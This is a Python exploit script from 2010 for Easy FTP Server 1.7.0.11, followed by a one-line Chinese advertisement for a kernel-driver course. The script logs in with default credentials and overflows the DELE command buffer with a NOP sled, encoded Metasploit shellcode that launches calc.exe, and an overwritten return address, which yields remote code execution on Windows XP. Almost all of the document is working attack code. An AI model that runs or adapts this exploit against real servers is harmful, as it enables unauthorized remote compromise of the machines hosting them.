# Note: RNFR, DELE, RMD, STOR commands are have the same offset  

#  

# Exploit Title: Easy FTP Server v1.7.0.11 DELE Command Remote Buffer Overflow Exploit (Post Auth)  

# Date: August 08, 2010  

# Author: Glafkos Charalambous  

# Version: 1.7.0.11  

# Tested on: Windows XP SP3 En  

   

import socket  

import sys  

   

if len(sys.argv) != 3:  

    print "Usage: ./easyftp_DELE.py <Target IP> <Port>"

    sys.exit(1)  

     

target = sys.argv[1]  

port = int(sys.argv[2])  

   

buffersize = 268

   

   

# windows/exec - 227 bytes  

# http://www.metasploit.com  

# Encoder: x86/shikata_ga_nai  

# EXITFUNC=process, CMD=calc.exe  

   

shellcode = ("\xd9\xec\xba\x4c\x61\x82\xbc\xd9\x74\x24\xf4\x33\xc9\xb1\x33"

"\x58\x31\x50\x17\x83\xe8\xfc\x03\x1c\x72\x60\x49\x60\x9c\xed"

"\xb2\x98\x5d\x8e\x3b\x7d\x6c\x9c\x58\xf6\xdd\x10\x2a\x5a\xee"

"\xdb\x7e\x4e\x65\xa9\x56\x61\xce\x04\x81\x4c\xcf\xa8\x0d\x02"

"\x13\xaa\xf1\x58\x40\x0c\xcb\x93\x95\x4d\x0c\xc9\x56\x1f\xc5"

"\x86\xc5\xb0\x62\xda\xd5\xb1\xa4\x51\x65\xca\xc1\xa5\x12\x60"

"\xcb\xf5\x8b\xff\x83\xed\xa0\x58\x34\x0c\x64\xbb\x08\x47\x01"

"\x08\xfa\x56\xc3\x40\x03\x69\x2b\x0e\x3a\x46\xa6\x4e\x7a\x60"

"\x59\x25\x70\x93\xe4\x3e\x43\xee\x32\xca\x56\x48\xb0\x6c\xb3"

"\x69\x15\xea\x30\x65\xd2\x78\x1e\x69\xe5\xad\x14\x95\x6e\x50"

"\xfb\x1c\x34\x77\xdf\x45\xee\x16\x46\x23\x41\x26\x98\x8b\x3e"

"\x82\xd2\x39\x2a\xb4\xb8\x57\xad\x34\xc7\x1e\xad\x46\xc8\x30"

"\xc6\x77\x43\xdf\x91\x87\x86\xa4\x6e\xc2\x8b\x8c\xe6\x8b\x59"

"\x8d\x6a\x2c\xb4\xd1\x92\xaf\x3d\xa9\x60\xaf\x37\xac\x2d\x77"

"\xab\xdc\x3e\x12\xcb\x73\x3e\x37\xa8\x12\xac\xdb\x01\xb1\x54"

"\x79\x5e")  

   

   

eip = "\x91\xC8\x41\x7E" # CALL EDI - user32.dll  

nopsled = "\x90" * 16

junk = "\x90" * (buffersize-(len(nopsled)+len(shellcode)))  

payload = nopsled+shellcode+junk+eip  

   

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  

try:  

    connect = s.connect((target, port))  

    print "[+] Connected"

except:  

    print "[!] Connection Failed"

    sys.exit(0)  

s.recv(1024)  

      

s.send('User ftp\r\n')  

s.recv(1024)  

s.send('PASS ftp\r\n')  

s.recv(1024)  

print "[+] Sending payload..."

s.send('DELE '+payload+'\r\n')  

s.recv(1024)  

s.close()

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课